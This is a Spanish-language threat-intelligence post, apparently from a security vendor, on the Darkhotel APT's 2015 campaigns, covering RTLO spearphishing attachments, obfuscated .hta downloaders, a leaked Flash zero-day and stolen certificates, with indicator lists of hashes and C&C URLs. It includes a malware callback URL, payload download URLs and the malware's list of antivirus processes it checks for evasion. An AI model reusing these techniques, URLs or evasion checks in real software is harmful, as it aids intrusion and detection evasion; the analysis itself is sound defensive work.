Los ataques de Darkhotel en 2015

Los ataques del APT Darkhotel que tuvieron lugar hasta 2014 se caracterizan por el uso de certificados robados, la instalación de archivos .hta mediante múltiples técnicas, y la utilización de métodos poco usuales, como la infiltración en la red wi-fi de hoteles para colocar puertas traseras en los sistemas atacados. En 2015, todavía siguen empleándose muchas de esas técnicas y actividades. Sin embargo, además de las nuevas variantes del archivo malicioso .hta, encontramos nuevas víctimas, archivos adjuntos .rar con spearphishing RTLO, y la instalación de un día cero Hacking Team.

El APT Darkhotel sigue lanzando ataques spearphishing contra blancos en todo el mundo, con un alcance geográfico más amplio que el de los anteriores ataques contra las redes wi-fi de hoteles y la conformación de una red zombi. Algunas de las víctimas son diplomáticos o representan intereses comerciales estratégicos.

Los blancos y víctimas de Darkhotel en 2015 se localizaron en estos países:

  • Corea del Norte
  • Rusia
  • Corea del Sur
  • Japón
  • Bangladesh
  • Tailandia
  • India
  • Mozambique
  • Alemania

Estos son el archivo .hta, la puerta trasera relacionada, el exploit relacionado y dos sitios C&C de Darhotel en 2015:

  • storyonboard[.]net
  • tisone360[.]org
  • openofficev[.]info
  • saytargetworld[.]net
  • error-page[.]net
  • eonlineworld[.]net
  • enewsbank[.]net
  • thewordusrapid[.]com

Subconjunto de nombres de adjuntos relacionado con los incidentes spearphishing en 2015:

  • schedule(6.1~6).rar -> schedule(6.1~6)_?gpj.scr
  • schedule(2.11~16).rar -> schedule(2.11~16)_?gpj.scr
  • congratulation.rar -> congratulation_?gpj.scr
  • letter.rar -> letter_?gpj.scr

Uso consistente de descargadores ofuscados de .hta

Ya sea que la infección se realice a través de ataques spearphishing, de acceso físico al sistema o del exploit Flash día cero de Hacking Team, las más de las veces parece ser un método común para que un sistema recién infectado se comunique con el C&C de Darkhotel:

Un script ligeramente ofuscado (valores de variables de javascript ofuscados con escapes dobles), que se mantiene en un archivo .hta, escribe un ejecutable en el disco y lo lanza.

Resulta interesante que desde hace años este grupo haya instalado puertas traseras y códigos descargadores en la forma de archivos .hta. En 2010, observamos repetitivos artículos sobre Corea del Norte, publicados por el grupo norteamericano de expertos Brookings Institute, para atacar blancos relacionados con Corea del Norte mediante códigos maliciosos incorporados en archivos .hta. También enviaron mensajes de correo, que incluían enlaces a sus archivos maliciosos .hta, a grupos de turistas norcoreanos y economistas con intereses en Corea del Norte, entre otros. Resulta un poco extraño ver tanta dependencia de tecnología obsoleta de Windows, como las aplicaciones HTML, que Microsoft introdujo en 1999.

Fragmento del reciente sendspace.servermsys.com/downloader.hta:

Después de ejecutar y hacer el escaping de un par de variables, el archivo .hta recurre a antiguos componentes Adodb.stream para escribir una cadena xor’d con 0x3d como un archivo ejecutable, y lo ejecuta.

Este código resulta en la ejecución de “internet_explorer_Smart_recovery.exe” (MD5: 054471f7e168e016c565412227acfe7f), y una ventana oculta de navegador que telefonea a su C&C. En este caso, parece que los operadores de Darkhotel verifican si el navegador de la víctima es o no es Internet Explorer, ya que todas las versiones de IE producen el valor “0”, mientras que otros navegadores no definen “appMinorVersion”. Esta recopilación de datos parece un poco extraña, porque los archivos .hta son soportados y ejecutados por mshta.exe sólo en sistemas Windows, que todavía siguen presentes en las distribuciones de Windows 8. Quizás se trate de un artefacto de las primeras etapas del desarrollo del código. Esta es una versión reciente:

“hxxp://sendspace.servermsys.com/readme.php?type=execution&result=created_and_executed&info=” + navigator.appMinorVersion + ”

El archivo “internet_explorer_Smart_recovery.exe” es un sencillo descargador ofuscado. Una serie de bucles xor 0x28 descifran los contenidos de un archivo batch, capaz de autoeliminarse, que después se escribe en el disco y se ejecuta. Más adelante en la ejecución, un bucle rc4 más complejo descifra la URL descargada y otras cadenas y datos.

Cuando termina, esta cadena URL descifrada y el connectback lucen así:

http://sendspace.servermsys.com/wnctprx. El archivo se descarga (b1f56a54309147b07dda54623fecbb89) al archivo “.tmp” en %temp%, se ejecuta y el descargador sale. Este archivo más extenso es una puerta trasera/descargador que incluye funciones ssh, y descarga sus llaves en el disco para la interacción ssh. Hemos encontrado antiguos ladrones de información de Darkhotel descargados y ejecutados en el sistema por estos descargadores.

Spearphishing y adjuntos .rar con RTLO

El APT Darkhotel lanza incesantes ataques spearphish contra blancos específicos para poder comprometer sus sistemas. Algunos blancos reciben repetidos ataques spearphish con esquemas muy parecidos de ingeniería social. Por ejemplo, el adjunto “schedule(2.11~16).rar” podría haberse enviado el 10 de febrero, y Darkhotel podría retomar los mismos blancos a fines de mayo, en un segundo intento, con el adjunto “schedule(6.1~6).rar”.

Comprime sistematicamente los archivos ejecutables RTLO .scr dentro de archivos comprimidos .rar, a fin de que aparezcan ante la víctima como archivos .jpg inofensivos. Estos son archivos ejecutables, que tienen estos archivos jpeg como carnada, y el código para crear un descargador Ink.

Cuando la víctima procede a abrir lo que suponen es un archivo de imagen jpg, el código ejecutable se ejecuta, descarga una imagen jpg al disco, y la abre con mspaint.exe en segundo plano. Este documento “de felicitació” está en coreano, lo que revela una posible característica de la víctima potencial.

Mientras se muestra la imagen, el código descarga un inusual acceso directo mspaint.Ink en el disco y lo ejecuta. El acceso directo contiene varios renglones de un script shell. Esta técnica también se usa en otros APTs como mecanismos de persistencia, como lo documentaron nuestros colegas de Mandiant. El archivo Ink de 64kb es un código descargador:

Cuando se ejecuta el archivo Ink, comienza un proceso de descarga desarrollado en AJAX para el archivo “unzip.js” (a07124b65a76ee7d721d746fd8047066) en openofficev.info. Este es otro archivo wscript desarrollado en AJAX para descargar y ejecutar un ejecutable compilado relativamente grande:

Este código ejecutable se guarda en %temp%csrtsrm.exe, donde se ejecuta. Es un ejecutable relativamente grande (~1.2 mb) que inyecta un código malicioso y relanza hilos remotos en procesos legítimos.

Certificados robados y evasión

El grupo parece disponer de un arsenal de certificados robados e instala sus descargadores y puertas traseras firmados con ellos. Algunos de los últimos certificados revocados pertenecen a Xuchang Hongguang Technology Co. Ltd.

Darkhotel ahora tiende a ocultar su código bajo varias capas de cifrado. Es posible que se esté adaptado lentamente paa atacar ambientes con mejores defensas y que prefiera no sacrificar todavía sus certificados digitales robados. En ataques anteriores pudo haberse aprovechado de una larga lista de certificados fracturados y débilmente implementados.

No sólo sus técnicas de ofuscación se están fortaleciendo, sino que su lista de tecnologías antidetección se está ampliando. Por ejemplo, este descargador firmado (d896ebfc819741e0a97c651de1d15fec) descifra por etapas un conjunto de cadenas anti-malware para identificar tecnologías defensivas en un sistema que acaba de infectarse para después abrir cada proceso, buscando un nombre de imagen que coincida:

c:avast! sandboxWINDOWSsystem32kernel32.dll – Avast!
avp.exe – Kaspersky Lab
mcagent.exe;mcuicnt.exe – Intel/Mcafee
bdagent.exe – BitDefender
ravmon.exe,ravmond.exe – Beijing Rising
360tray.exe,360sd.exe,360rp.exe,exeMgr.exe – Qihoo 360
ayagent.aye,avguard.;avgntsd.exe – Avira Antivirus
ccsvchst.exe,nis.exe – Symantec Norton
avgui.exe,avgidsagent.exe,avastui.exe,avastsvc.exe – Avast!
msseces.exe;msmpeng.exe – Microsoft Security Essentials y Microsoft Anti-Malware Service
AVK.exe;AVKTray.exe – G-Data
avas.exe – TrustPort AV
tptray.exe – utilidad deToshiba
fsma32.exe;fsorsp.exe – F-Secure
econser.exe;escanmon.exe – Microworld Technologies eScan
SrvLoad.exe;PSHost.exe – Panda Software
egui.exe;ekrn.exe – ESET Smart Security
pctsSvc.exe;pctsGui.exe – PC Tools Spyware Doctor
casc.exe;UmxEngine.exe – CA Security Center
cmdagent.exe;cfp.exe – Comodo
KVSrvXP.exe;KVMonXP.exe – Jiangmin Antivirus
nsesvc.exe;CClaw.exe – Norman
V3Svc.exe – Ahnlab
guardxup. – IKARUS
FProtTray. – F-Prot
op_mon – Agnitum Outpost
vba332ldr.;dwengine. – DrWeb

Incluso la información de identificación que la puerta trasera busca en un sistema no se descifra hasta el momento del runtime. Al igual que el componente “ladrón de información”, documentado en nuestro anterior informe técnico sobre Darkhotel, este componente busca robar un conjunto de datos con los cuales identificará el sistema infectado. Gran parte de la información se recopila con el mismo conjunto de llamadas, es decir, kernel32.GetDefaultSystemLangID, kernel32.GetVersion, and kernel32.GetSystemInfo:

  • Página de códigos predeterminada del sistema
  • Información del adaptador de red
  • Arquitectura del procesador
  • Hostname y dirección IP
  • Sistema operativo Windows y versiones de Service Pack

En esencia, gran parte del código de este ladrón de información es la misma que observamos en ataques anteriores.

Tisone360.com, visitas, y el día cero Flash Hacking Team

El sitio tisone360.com nos pareció particularmente interesante. En abril de 2015, Darkhotel estaba enviando mensajes de correo phishing con enlaces a anteriores exploits Flash (cve-2014), y después, a principios de julio, comenzó a distribuir lo que se ha clasificado como un Flash día cero que se le filtró a Hacking Team.

Al parecer, el APT Darkhotel puede haber estado utilizando este Flash día cero para atacar a determinados sistemas. Pudimos utilizar “tisone360.com” para identificar algunas de sus actividades. El sitio estaba implementado y activo hasta el 22 de julio de 2015. Sin embargo, esta parece ser sólo una pequeña parte de sus actividades. Además del día cero icon.swfHT (214709aa7c5e4e8b60759a175737bb2b), al parecer el sitio “tisone360.com” estaba propagando el exploit Flash CVE-2014-0497 en abril. Informamos sobre la vulnerabilidad relacionada a Adobe en enero de 2014, cuando el APT Darkhotel la utilizaba.

Recientemente, el APT Darkhotel ha mantenido múltiples directorios funcionando en este sitio.

El directorio ims2 es el más activo. Contiene un conjunto de puertas traseras y exploits. El más interesante de estos es la vulnerabilidad Flash día cero de Hacking Team, icon.swf. En los días siguientes a la publicación de este servidor, el equipo limitó paulatinamente el acceso a /ims2/. De cualquier forma, los contenidos seguían siendo usados de forma activa.

icon.swf (214709aa7c5e4e8b60759a175737bb2b) -> icon.jpg (42a837c4433ae6bd7490baec8aeb5091)
-> %temp%RealTemp.exe (61cc019c3141281073181c4ef1f4e524)

Después de que el exploit Flash descargaba icon.jog, se descifraba con una llave multibytes xor 0xb369195a02, tras lo cual se descargaban otros componentes.

Vale la pena notar que el grupo parece estar alterando la compilación y los sellos de tiempo vinculantes de su código ejecutable a fechas en 2013. Hemos visto esto en múltiples muestras instaladas y lo descubrimos a mediados de 2015, junto con el descargador icon.jpg.

El registro de visitas al directorio del sitio revela que el directorio se implementó el 8 de julio. El 8 y el 9 se registraron algunas visitas a una URL específica en el servidor desde cinco sistemas basados en los siguientes lugares (varios de éstos son posibles blancos del APT Darkhotel):

  • Alemania
  • Corea del Sur
  • China (posiblemente una investigación)
  • EE.UU.
  • Japón

Sin embargo, uno de estos sistemas colapsó el sitio el 9, con 12.000 visitas en 30 minutos. Este volumen de tráfico puede significar un ruidoso intento de escaneo, y no así ataques DoS contra el sitio:

Las visitas registradas en el sitio después del 9 son probablemente poco confiables y pueden haber más investigadores, en respuesta a la creciente notoriedad del sitio tras la publicación de informes el 9. Muchas de estas aproximadamente 50 visitas provienen de un subconjunto de los sistemas mencionados arriba y se repiten muchas veces. Las visitas desde los siguientes lugares ocurrieron el 10 o después:

  • Alemania (posiblemente una investigación)
  • Ucrania (posiblemente una investigación)
  • Sitios de Amazon, en varios lugares (posiblemente una investigación)
  • Googlebot, varios lugares
  • EE.UU.
  • Irlanda (posiblemente una investigación)
  • Rusia
  • Brasil
  • China
  • Finlandia
  • Canadá
  • Taiwán
  • Francia (posiblemente una investigación)
  • República Checa

Un flujo consistente de ataques

El grupo Darkhotel tiende a aferrarse a las técnicas que dan resultado. Por ejemplo, por años hemos visto el uso repetido de ataques spearphishing directamente desde archivos .hta. Ahora en 2015, como con el sitio tisone360.com mencionado arriba, hemos observado el uso repetido de una cadena creativa de conjuntos de propagación.

descargador -> verificación hta -> ladrón de información -> más componentes compilados.
vector -> script wsh -> script wsh -> ladrón de información -> más componentes compilados.
spearphish -> vector -> verificación hta -> descargador -> ladrón de información

Si bien una cadena de propagación que incluye scripts ofuscados dentro de archivos .hta ocurrió en 2011, el volumen parece haber aumentado en 2014 y ahora en 2105.

openofficev[.]info (2015)
office-revision[.]com (2014)
online.newssupply[.]net (2011)

Infraestructura oculta a plena vista

El grupo está ahora más alerta con el mantenimiento de sus sitios, y es más estricto con su configuración y respuesta. En este momento, su C&C responde con imágenes del anti-héroe “Drinky Crow”, de las caricaturas Maakies.

Otros C&C de Darkhotel tienden a combinarse con sitios aleatorios en la web cuando se visitan páginas incorrectas o no existentes. Extraen imágenes desde FOTOLIA o desde artículos de sitios de fabricantes de helados artesanales:

Detalles técnicos

HTA md5:

021685613fb739dec7303247212c3b09
1ee3dfce97ab318b416c1ba7463ee405
2899f4099c76232d6362fd62ab730741
2dee887b20a06b8e556e878c62e46e13
6b9e9b2dc97ff0b26a8a61ba95ca8ff6
852a9411a949add69386a72805c8cb05
be59994b5008a0be48934a9c5771dfa5
e29693ce15acd552f1a0435e2d31d6df
fa67142728e40a2a4e97ccc6db919f2b
fef8fda27deb3e950ba1a71968ec7466

Adjuntos spearphish md5:

5c74db6f755555ea99b51e1c68e796f9
c3ae70b3012cc9b5c9ceb060a251715a
560d68c31980c26d2adab7406b61c651
da0717899e3ccc1ba0e8d32774566219
d965a5b3548047da27b503029440e77f
dc0de14d9d36d13a6c8a34b2c583e70a
39562e410bc3fb5a30aca8162b20bdd0 (detectado a fines de 2014, usado en 2015)
e85e0365b6f77cc2e9862f987b152a89 (detectado a fines de 2014, usado en 2015)

Descargador grande md5 en 2015:

5e01b8bc78afc6ecb3376c06cbceb680
61cc019c3141281073181c4ef1f4e524
3d2e941ac48ae9d79380ca0f133f4a49
fc78b15507e920b3ee405f843f48a7b3
da360e94e60267dce08e6d47fc1fcecc
33e278c5ba6bf1a545d45e17f7582512
b1f56a54309147b07dda54623fecbb89
009d85773d519a9a97129102d8116305

Ladrones de información descargados en 2015

61637a0637fb25c53f396c305efa5dc5
a7e78fd4bf305509c2fc1b3706567acd

Subhosts y URLs:

tisone360.com/img_h/ims2/icon.swf
tisone360.com/img_h/ims2/1.php
tisone360.com/img_h/ims2/icon.jpg
tisone360.com/noname/img/movie.swf
tisone360.com/noname/minky/face.php
tisone360.com/htdoc/ImageView.hta
tisone360.com/htdoc/page1/page.html
daily.enewsbank.net/wmpsrx64
daily.enewsbank.net/newsviewer.hta
saytargetworld.net/season/nextpage.php
sendspace.servermsys.com/wnctprx
error-page.net/update/load.php
photo.storyonboard.net/wmpsrx64
photo.storyonboard.net/photoviewer.hta
photo.storyonboard.net/readme.php
unionnewsreport.net/aeroflot_bonus/ticket.php
www.openofficev.info/xopen88/office2
www.openofficev.info/dec98/unzip.js
www.openofficev.info/open99/office32
www.openofficev.info/decod9/unzip.js

Investigaciones previas y paralelas

Vulnerabilidad CVE-2014-0497 – A 0-day

Hacking Team Flash Zero-Day vinculado a ataques en Corea y Japón… el 1 de julio

El APT Darkhotel

Publicaciones relacionadas

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *